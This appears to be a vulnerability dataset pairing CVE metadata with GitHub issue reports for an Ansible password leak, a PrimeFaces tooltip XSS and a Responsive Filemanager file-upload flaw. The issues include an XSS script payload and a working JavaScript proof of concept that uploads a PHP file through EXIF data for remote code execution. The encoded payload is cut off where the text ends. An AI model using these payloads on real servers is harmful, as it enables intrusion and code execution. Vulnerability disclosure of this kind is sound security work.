"secalert@redhat.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 3.9, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.3, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1739" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/67797" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/05/msg00005.html" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FWDK3QUVBULS3Q3PQTGEKUQYPSNOU5M3/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QT27K5ZRGDPCH7GT3DRI3LO4IVDVQUB7/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U3IMV3XEIUXL6S4KPLYYM4TVJQ2VNEP2/" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4950" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1739" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/67797" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/05/msg00005.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FWDK3QUVBULS3Q3PQTGEKUQYPSNOU5M3/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QT27K5ZRGDPCH7GT3DRI3LO4IVDVQUB7/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U3IMV3XEIUXL6S4KPLYYM4TVJQ2VNEP2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4950" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "89338CDC-A956-4F24-A2A2-EA5CFD78F235", "versionEndExcluding": null, "versionEndIncluding": "2.7.16", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "D144C559-37B8-4DED-9D8B-61CE1134B3A5", "versionEndExcluding": null, "versionEndIncluding": "2.8.8", "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "FA56E1B5-A742-4D2E-BF0B-C806689A3E05", "versionEndExcluding": null, "versionEndIncluding": "2.9.5", "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "C3C5721F-050A-42A3-A71D-6C6BA23D58FE", "versionEndExcluding": null, "versionEndIncluding": "3.3.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "F5C0F920-A505-452D-AFAA-AE6C20FB25EF", "versionEndExcluding": null, "versionEndIncluding": "3.4.5", "versionStartExcluding": null, "versionStartIncluding": "3.4.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "F2062F74-68D8-4E75-BC69-6038B519F823", "versionEndExcluding": null, "versionEndIncluding": "3.5.5", "versionStartExcluding": null, "versionStartIncluding": "3.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "342D4A63-0972-413B-BD65-0495DBF1CDFB", "versionEndExcluding": null, "versionEndIncluding": "3.6.3", "versionStartExcluding": null, "versionStartIncluding": "3.6.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:cloudforms_management_engine:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "7098B44F-56BF-42E3-8831-48D0A8E99EE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openstack:13:*:*:*:*:*:*:*", "matchCriteriaId": "704CFA1A-953E-4105-BFBE-406034B83DED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/ansible/ansible/issues/67797
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ansible", "ansible" ]
<!--- Verify first that your issue is not already reported on GitHub --> <!--- Also test if the latest release and devel branch are affected too --> <!--- Complete *all* sections as described, this form is processed automatically --> ##### SUMMARY CVE-2020-1739 <!--- Explain the problem briefly below --> The `password` is used in the `svn` command that is run by the `subversion` module. The password should be passed in via some other mechanism other than as a parameter to avoid the password being read at `/proc/<pid>/cmdline` on the managed node. **Problematic code:** https://github.com/ansible/ansible/blob/79dfae9624480f757795224732bfaa9ca1dd4543/lib/ansible/modules/source_control/subversion.py#L138-L140 ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME <!--- Write the short name of the module, plugin, task or feature below, use your best guess if unsure --> `lib/ansible/modules/source_control/subversion.py` ##### ANSIBLE VERSION <!--- Paste verbatim output from "ansible --version" between quotes --> ```paste below 2.10 ``` ##### CONFIGURATION <!--- Paste verbatim output from "ansible-config dump --only-changed" between quotes --> ```paste below default ``` ##### OS / ENVIRONMENT <!--- Provide all relevant information below, e.g. target OS versions, network device firmware, etc. --> ##### STEPS TO REPRODUCE <!--- Describe exactly how to reproduce the problem, using a minimal test-case --> <!--- Paste example playbooks or commands between quotes below --> ```yaml - subversion: repo: svn+ssh://an.example.org/path/to/repo dest: /src/checkout checkout: no update: no password: "{{ vault_svn_pass }}" ``` <!--- HINT: You can paste gist.github.com links for larger files --> ##### EXPECTED RESULTS <!--- Describe what you expected to happen when running the steps above --> Password is not visible. ##### ACTUAL RESULTS Password can be observed at `/proc/<pid>/cmdline` on the managed node.
Command used in subversion module is problematic
https://api.github.com/repos/ansible/ansible/issues/67797/comments
2
2020-02-26T19:58:52Z
2020-05-11T13:00:03Z
https://github.com/ansible/ansible/issues/67797
571,621,996
67,797
1,109
CVE-2020-10544
2020-03-13T15:15:11.263
An XSS issue was discovered in tooltip/tooltip.js in PrimeTek PrimeFaces 7.0.11. In a web application using PrimeFaces, an attacker can provide JavaScript code in an input field whose data is later used as a tooltip title without any input validation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/primefaces/primefaces/issues/5642" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/primefaces/primefaces/issues/5642" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:primetek:primefaces:7.0.11:*:*:*:*:*:*:*", "matchCriteriaId": "BB928810-1C50-4DDA-A273-4A3E9AB409DA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/primefaces/primefaces/issues/5642
[ "Third Party Advisory" ]
github.com
[ "primefaces", "primefaces" ]
## 1) Environment - PrimeFaces version: 7.0.11 - Does it work on the newest released PrimeFaces version? No - Does it work on the newest sources in GitHub? No - Affected browsers: all ## 2) Expected behavior Proper escaping of title referenced by p:tooltip for . ## 3) Actual behavior Target title not escaped in tooltip.js if this.cfg.target is set in tooltip.js. ## 4) Steps to reproduce ## 5) Sample XHTML <p:inputText id="focus" title="This tooltip is displayed when input gets the focus&lt;script&gt;alert('xss');&lt;/script&gt;" /> <p:tooltip id="toolTipFocus" for="focus" showEvent="focus" hideEvent="blur" /> ## 6) Sample bean - ## 7) Solution This error was fixed for the bindGlobal function in tooltip.js with #4394. Same solution should be applied to Function bindTarget. The line this.cfg.escape = (this.cfg.escape === undefined) ? true : this.cfg.escape; must be added at top of bindTarget.
Tooltip: XSS in target title
https://api.github.com/repos/primefaces/primefaces/issues/5642/comments
7
2020-03-04T12:09:20Z
2024-01-23T20:15:31Z
https://github.com/primefaces/primefaces/issues/5642
575,351,426
5,642
1,110
CVE-2020-10567
2020-03-14T14:15:11.310
An issue was discovered in Responsive Filemanager through 9.14.0. In the ajax_calls.php file in the save_img action in the name parameter, there is no validation of what kind of extension is sent. This makes it possible to execute PHP code if a legitimate JPEG image contains this code in the EXIF data, and the .php extension is used in the name parameter. (A potential fast patch is to disable the save_img action in the config file.)
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://packetstormsecurity.com/files/171280/ZwiiCMS-12.2.04-Remote-Code-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/trippo/ResponsiveFilemanager/issues/600" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://packetstormsecurity.com/files/171280/ZwiiCMS-12.2.04-Remote-Code-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/trippo/ResponsiveFilemanager/issues/600" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:*", "matchCriteriaId": "54CD0F21-D4B5-4F0A-87ED-FA0D20A9D73C", "versionEndExcluding": null, "versionEndIncluding": "9.14.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/trippo/ResponsiveFilemanager/issues/600
[ "Exploit", "Third Party Advisory" ]
github.com
[ "trippo", "ResponsiveFilemanager" ]
after taking another look at your application i noticed in the ajax_calls.php file in the "save_img" action that the "name" parameter doesn't validate the extension of the file. this makes it possible to upload php files to the server even when this normaly should not be allowed. there was a miner validation to check if the data from the "url" parameter started with "data:image/jpeg;base64," and that the base64 encoded image is a valid image. a simple work arround to bypass this check is to upload a valid jpeg image, but that inside of exif data a php tag is send. this makes it possible to send php code and that the extension becomes php what let to remote code execution. As poc i will send a normal image where the base64 encoded image contains phpinfo() as php code. here is a simple javascript POC that will send a POST request to the page "http://192.168.0.29:3001/filemanager/ajax_calls.php?action=save_img" where the "path" parameters is empty, the url contains my image with phpinfo in the exif data and the name is set to poc.php. you will need to change the ip and port to your webserver and this code has to be runned on the filemanagers dialog.php page, because the session is validated and by running the code from the dialog page than the session is set and you won't get error's. if you run this command from the browsers console in the dialog page than a new file would be created in the /source/ folder called poc.php. ( UPLOAD_DIR ) than just go to "http://YOURURL/source/poc.php" and you will see the phpinfo() code executed. ```javascript function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/192.168.0.29:3001\/filemanager\/ajax_calls.php?action=save_img", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9"); xhr.withCredentials = true; var body = "url=data:image/jpeg;base64,%2f%39%6a%2f%34%51%42%32%52%58%68%70%5a%67%41%41%54%55%30%41%4b%67%41%41%41%41%67%41%42%51%45%61%41%41%55%41%41%41%41%42%41%41%41%41%53%67%45%62%41%41%55%41%41%41%41%42%41%41%41%41%55%67%45%6f%41%41%4d%41%41%41%41%42%41%41%49%41%0a%41%41%45%37%41%41%49%41%41%41%41%55%41%41%41%41%57%67%49%54%41%41%4d%41%41%41%41%42%41%41%45%41%41%41%41%41%41%41%41%41%41%41%42%49%41%41%41%41%41%51%41%41%41%45%67%41%41%41%41%42%50%44%39%77%61%48%41%67%63%47%68%77%61%57%35%6d%0a%62%79%67%70%4f%79%41%2f%50%67%44%2f%32%77%43%45%41%41%67%47%42%67%63%47%42%51%67%48%42%77%63%4a%43%51%67%4b%44%42%51%4e%44%41%73%4c%44%42%6b%53%45%77%38%55%48%52%6f%66%48%68%30%61%48%42%77%67%4a%43%34%6e%49%43%49%73%49%78%77%63%0a%4b%44%63%70%4c%44%41%78%4e%44%51%30%48%79%63%35%50%54%67%79%50%43%34%7a%4e%44%49%42%43%51%6b%4a%44%41%73%4d%47%41%30%4e%47%44%49%68%48%43%45%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%0a%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%76%2f%41%41%42%45%49%41%5a%41%42%6b%41%4d%42%49%67%41%43%45%51%45%44%45%51%48%2f%78%41%47%69%41%41%41%42%42%51%45%42%0a%41%51%45%42%41%51%41%41%41%41%41%41%41%41%41%41%41%51%49%44%42%41%55%47%42%77%67%4a%43%67%73%51%41%41%49%42%41%77%4d%43%42%41%4d%46%42%51%51%45%41%41%41%42%66%51%45%43%41%77%41%45%45%51%55%53%49%54%46%42%42%68%4e%52%59%51%63%69%0a%63%52%51%79%67%5a%47%68%43%43%4e%43%73%63%45%56%55%74%48%77%4a%44%4e%69%63%6f%49%4a%43%68%59%58%47%42%6b%61%4a%53%59%6e%4b%43%6b%71%4e%44%55%32%4e%7a%67%35%4f%6b%4e%45%52%55%5a%48%53%45%6c%4b%55%31%52%56%56%6c%64%59%57%56%70%6a%0a%5a%47%56%6d%5a%32%68%70%61%6e%4e%30%64%58%5a%33%65%48%6c%36%67%34%53%46%68%6f%65%49%69%59%71%53%6b%35%53%56%6c%70%65%59%6d%5a%71%69%6f%36%53%6c%70%71%65%6f%71%61%71%79%73%37%53%31%74%72%65%34%75%62%72%43%77%38%54%46%78%73%66%49%0a%79%63%72%53%30%39%54%56%31%74%66%59%32%64%72%68%34%75%50%6b%35%65%62%6e%36%4f%6e%71%38%66%4c%7a%39%50%58%32%39%2f%6a%35%2b%67%45%41%41%77%45%42%41%51%45%42%41%51%45%42%41%51%41%41%41%41%41%41%41%41%45%43%41%77%51%46%42%67%63%49%0a%43%51%6f%4c%45%51%41%43%41%51%49%45%42%41%4d%45%42%77%55%45%42%41%41%42%41%6e%63%41%41%51%49%44%45%51%51%46%49%54%45%47%45%6b%46%52%42%32%46%78%45%79%49%79%67%51%67%55%51%70%47%68%73%63%45%4a%49%7a%4e%53%38%42%56%69%63%74%45%4b%0a%46%69%51%30%34%53%58%78%46%78%67%5a%47%69%59%6e%4b%43%6b%71%4e%54%59%33%4f%44%6b%36%51%30%52%46%52%6b%64%49%53%55%70%54%56%46%56%57%56%31%68%5a%57%6d%4e%6b%5a%57%5a%6e%61%47%6c%71%63%33%52%31%64%6e%64%34%65%58%71%43%67%34%53%46%0a%68%6f%65%49%69%59%71%53%6b%35%53%56%6c%70%65%59%6d%5a%71%69%6f%36%53%6c%70%71%65%6f%71%61%71%79%73%37%53%31%74%72%65%34%75%62%72%43%77%38%54%46%78%73%66%49%79%63%72%53%30%39%54%56%31%74%66%59%32%64%72%69%34%2b%54%6c%35%75%66%6f%0a%36%65%72%79%38%2f%54%31%39%76%66%34%2b%66%72%2f%32%67%41%4d%41%77%45%41%41%68%45%44%45%51%41%2f%41%50%66%36%4b%4b%4b%41%43%6a%74%52%52%51%41%30%39%44%53%30%68%36%47%6c%46%49%41%6f%70%4f%31%4c%6b%41%64%61%59%57%47%6b%43%67%41%43%0a%6a%67%30%68%46%4a%75%51%63%77%75%61%4d%6a%4e%4e%48%70%54%4a%4a%55%51%66%4d%77%47%50%55%31%44%71%52%69%72%74%68%47%38%69%51%34%78%79%4b%54%4b%34%7a%2f%4f%73%57%2f%31%79%4f%33%42%43%4d%47%50%74%57%44%64%61%39%63%58%42%79%72%47%4d%0a%41%59%77%4f%2f%76%58%6e%31%38%79%70%30%30%37%4d%33%6a%68%33%49%37%43%34%76%34%4c%66%2f%57%79%71%50%78%72%4f%6d%31%2b%32%69%42%49%4f%37%30%78%58%48%53%79%79%7a%74%6c%33%4c%2f%55%31%46%6b%45%34%47%65%4f%4f%61%38%69%76%6e%44%65%78%0a%32%55%38%45%32%74%54%71%58%38%56%51%48%49%45%62%45%2b%75%44%55%44%2b%4a%46%49%2b%52%63%48%33%72%42%55%45%44%6f%4d%66%53%6b%38%6f%45%35%49%72%7a%35%5a%70%4b%57%35%73%73%48%59%31%58%38%51%58%4a%50%41%58%48%30%71%4a%74%62%75%57%37%0a%44%38%71%70%65%55%43%4f%41%52%37%55%43%49%44%71%44%58%4c%4c%48%74%6d%6b%63%4d%6b%4f%65%35%6b%6e%42%42%41%41%50%57%70%49%4e%51%6c%73%78%69%4d%41%2b%35%71%50%79%53%65%41%65%44%33%70%44%43%46%42%41%79%77%37%31%6b%73%62%4a%4f%35%6f%0a%36%4e%31%59%31%49%50%45%56%77%68%42%64%51%56%39%68%57%6e%42%34%6e%74%70%57%43%73%68%55%2b%70%48%46%63%73%55%41%35%42%49%39%73%55%30%67%6b%63%6a%41%39%41%4f%74%65%68%52%7a%57%55%46%71%63%38%38%48%66%55%39%41%68%31%47%33%6e%47%46%0a%6c%56%73%39%67%61%74%69%51%59%35%35%2b%6c%65%61%51%50%4a%44%4a%75%6a%4a%58%33%7a%57%76%61%36%2f%63%78%45%5a%2b%59%44%67%6b%31%37%47%47%7a%61%4d%74%7a%6b%71%59%56%72%59%37%58%64%6b%63%44%69%6e%44%6d%73%71%78%31%61%4b%37%55%41%73%0a%41%78%37%56%70%71%77%49%34%4f%63%2b%6c%65%78%52%78%4d%61%69%75%6d%63%6b%6f%4f%4f%67%34%44%72%52%74%70%63%2b%6c%48%4e%64%56%39%4e%43%55%32%4b%4b%57%6d%67%30%36%67%51%55%55%55%55%41%46%46%46%46%41%42%52%52%52%51%41%55%55%55%55%41%0a%46%46%46%46%41%42%52%52%52%51%41%55%55%55%55%41%46%46%46%46%41%42%52%52%52%51%41%55%55%55%55%41%46%48%61%6a%4e%4a%6d%6b%41%68%36%47%6c%46%4a%32%6f%79%61%51%41%65%68%70%76%54%72%54%73%30%78%7a%6a%75%41%4b%55%70%4b%43%75%77%57%72%0a%73%68%63%6a%47%52%31%71%4b%53%64%59%31%79%37%41%44%36%31%6d%33%32%73%51%32%6f%4b%68%73%73%4b%35%6e%55%4e%5a%6c%75%56%49%47%51%50%61%76%4a%78%4f%5a%52%70%33%73%7a%70%70%34%65%55%74%54%62%31%44%78%43%6b%53%6c%59%44%75%50%53%75%64%0a%75%4e%54%75%5a%77%53%37%48%42%37%41%31%54%33%45%6a%70%7a%36%30%41%4d%65%51%54%6d%76%6e%63%54%6d%55%35%33%73%7a%30%61%57%47%6a%48%63%55%76%76%35%59%6e%50%76%53%71%6f%59%64%61%65%73%52%4f%43%63%6d%72%43%32%34%47%4d%41%38%31%35%55%0a%36%38%6e%71%32%64%4b%70%71%4f%71%4b%77%69%78%36%31%4d%73%51%49%34%46%57%30%67%42%48%49%4e%53%4c%43%42%30%46%63%37%72%4d%72%6e%73%72%46%52%59%54%6e%4f%4b%6b%45%52%39%4b%74%69%50%41%36%55%34%4a%39%61%79%6c%55%62%64%79%65%64%6c%52%0a%59%73%67%35%48%4e%4b%49%67%54%79%4b%74%62%42%36%47%6c%32%67%39%73%55%76%61%43%39%6f%79%6f%49%63%5a%34%70%44%44%6e%6a%70%37%31%63%32%59%37%56%48%49%6f%32%6b%5a%70%78%71%4e%6a%55%32%55%6d%6a%32%35%2b%59%47%6f%6d%77%65%70%46%57%47%0a%69%33%48%47%4b%65%6c%6b%43%63%6b%67%56%71%70%33%30%5a%61%71%61%61%6c%45%67%44%6f%61%59%52%7a%6a%6f%44%57%6f%62%47%50%48%55%56%58%6d%73%6d%55%5a%51%35%2b%74%62%51%6d%31%73%79%47%34%79%4b%36%79%4e%43%77%4b%4f%52%6a%30%4e%62%6d%6e%0a%36%37%4a%47%56%53%54%6b%65%70%72%42%77%56%4f%47%58%6d%6a%47%44%6c%69%52%36%59%72%76%6f%59%36%64%4a%32%54%30%4d%61%74%43%4d%6c%6f%65%68%32%31%31%48%4f%67%5a%47%42%7a%2f%41%44%71%63%6b%67%5a%72%67%37%4c%55%4a%4c%5a%68%68%75%43%63%0a%34%4a%72%72%62%4c%55%59%37%6c%52%38%77%33%59%36%5a%72%36%72%41%35%68%47%6f%72%53%5a%35%64%57%68%4b%42%6f%72%53%39%36%61%72%41%2b%6c%4c%6e%30%72%32%46%4a%4e%58%52%7a%44%71%4b%54%4e%41%6f%54%41%57%69%69%69%6d%41%55%55%55%55%41%46%0a%46%46%46%41%42%52%52%52%51%41%55%55%55%55%41%46%46%46%46%41%42%52%52%52%51%41%55%55%55%55%41%46%46%46%46%41%42%53%55%74%49%65%74%41%43%64%71%53%6c%50%53%6f%33%6b%43%67%2b%31%52%4f%61%68%47%37%42%4a%76%51%56%32%43%4b%53%54%67%43%0a%75%65%31%62%57%51%68%4d%63%54%63%39%44%53%61%76%72%49%6a%52%6f%6f%7a%6c%6a%78%58%4b%79%79%4d%51%7a%5a%79%78%50%63%31%38%2f%6a%38%66%6f%31%46%6e%66%68%38%4e%66%56%69%7a%54%73%37%4d%57%62%4a%4a%37%31%43%48%4a%4f%42%69%6d%39%51%43%0a%65%74%53%78%4a%69%76%6d%61%6c%65%55%37%74%6e%71%52%70%71%4b%30%42%59%6d%4e%57%59%6f%44%6a%4a%70%59%59%7a%6d%72%6b%61%63%59%72%69%6e%55%30%4b%65%68%48%44%45%54%6b%59%71%77%49%77%4f%4d%56%49%6b%5a%41%34%70%34%58%46%63%73%70%33%49%0a%63%78%71%4b%41%4f%6c%4f%43%47%70%46%46%4f%41%46%5a%75%52%6b%35%61%6b%65%77%34%6f%43%69%70%51%42%69%67%44%32%71%58%49%58%4d%4d%32%30%62%61%6b%41%78%32%70%63%66%53%6c%7a%43%35%69%75%77%4f%63%43%6f%32%69%59%6e%46%57%74%74%4e%77%52%0a%6b%69%74%49%53%51%31%49%72%37%51%67%78%6a%6d%6f%79%72%4d%63%6e%50%48%46%57%43%68%4c%5a%4e%4b%51%41%4f%4b%76%6e%4b%55%69%41%49%4d%63%6b%30%68%44%4b%44%67%35%46%54%37%66%6c%70%6f%54%4f%61%61%6b%33%73%50%6d%53%4b%55%67%44%41%35%55%0a%41%2b%74%56%6d%69%49%4a%4c%39%4f%31%61%62%52%5a%79%4b%67%6b%69%47%44%57%73%61%6a%53%31%4c%68%4e%4d%6f%59%2b%59%41%64%4b%6e%74%37%6c%37%61%63%46%57%49%48%31%70%72%78%34%4f%52%31%71%42%73%6b%38%6a%46%64%32%47%78%55%6f%37%43%71%55%0a%31%4a%48%63%61%66%71%4d%64%79%67%77%63%6b%44%6d%74%46%57%7a%30%36%56%35%35%62%58%62%32%30%6f%5a%53%63%41%39%6a%58%5a%61%5a%71%4b%33%63%51%79%52%75%41%36%56%39%66%6c%2b%59%52%6e%61%4c%5a%35%4f%49%6f%4f%4f%71%4e%51%48%69%6c%42%70%0a%67%49%4a%39%71%55%64%2b%76%57%76%63%54%54%31%52%79%57%48%30%55%67%36%55%74%4d%41%6f%6f%6f%6f%41%4b%4b%4b%4b%41%43%69%69%69%67%41%6f%6f%6f%6f%41%4b%4b%4b%4b%41%43%69%69%69%67%41%6f%6f%6f%6f%41%4b%4b%4b%4b%41%43%6b%50%57%6c%70%70%0a%6f%46%73%49%54%6a%6b%31%68%61%78%71%59%67%55%78%6f%63%73%52%57%74%64%54%43%4b%49%73%54%58%43%33%39%78%35%38%37%4d%43%54%67%6b%56%34%6d%5a%34%76%6b%69%30%6a%72%77%31%4e%53%64%32%56%4a%5a%6d%5a%32%64%75%57%71%73%70%4a%59%6e%4a%77%0a%61%63%78%59%35%48%59%30%49%76%4f%54%58%79%4d%35%75%62%75%32%65%78%46%4b%4b%73%68%59%6b%79%53%44%33%50%46%58%49%34%6c%48%42%50%4e%56%39%34%56%63%41%5a%4e%54%52%68%32%58%4f%44%6d%75%65%62%75%72%47%30%62%46%6d%49%59%7a%69%72%53%41%0a%31%54%69%33%6a%71%44%56%71%4a%7a%6e%42%72%6a%6b%69%4a%4d%74%4c%67%4c%69%6c%41%4f%54%6d%6b%51%5a%47%61%6b%51%41%35%2b%74%63%7a%33%4f%5a%73%56%52%67%63%30%6f%58%4e%4f%77%4d%55%6f%46%5a%7